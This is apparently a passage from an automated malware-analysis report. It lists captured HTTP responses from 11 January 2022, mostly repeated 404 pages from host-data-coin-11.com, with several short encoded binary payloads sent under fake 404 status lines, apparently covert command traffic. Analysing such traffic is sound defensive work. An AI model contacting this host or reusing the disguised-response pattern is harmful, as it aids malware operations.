                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 80 49 08 25 01 e5 e9 8d b0 a2 37 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fI:82OI%70
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 80 49 08 25 01 e5 e9 b4 a4 8e 0d 0a 30 0d 0a 0d 0a Data Ascii: 1eI:82OI%0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 67 5d a4 09 d7 cd 66 c7 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevg]fdP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 36 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 94 49 01 7f 05 f1 b4 89 a1 bd 1e b6 10 da 2c b9 53 4b db 12 e1 a4 2a ef 24 41 1b b2 ed 93 5a fd 0d 86 13 82 bd 38 87 22 ed ae 8d 58 7a e2 b2 4c 29 f4 bd e3 3d a1 c8 bc 5b ab 21 96 c4 33 43 5f 6c 0c 4c 8e f2 3d e3 fe 07 c3 b2 d9 5d 91 60 9d d2 69 0d 0a 30 0d 0a 0d 0a Data Ascii: 66I:82OI,SK*$AZ8"XzL)=[!3C_lL=]`i0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 6e 46 8c 15 d8 ea 66 e1 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevnFfdP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 31 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 53 5e 98 3d a0 e4 66 b1 7b 1b 1b a4 fc 0d 0a 30 0d 0a 0d 0a Data Ascii: 31I:82OTevS^=f{0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 11 Jan 2022 19:43:35 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 11 Jan 2022 19:43:38 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 04 48 c6 35 d0 d8 66 ea 25 5e 1b ee a8 88 1c bf 55 c7 17 9e ab 0d 0a 30 0d 0a 0d 0a Data Ascii: 39I:82OTevH5f%^U0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:45:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
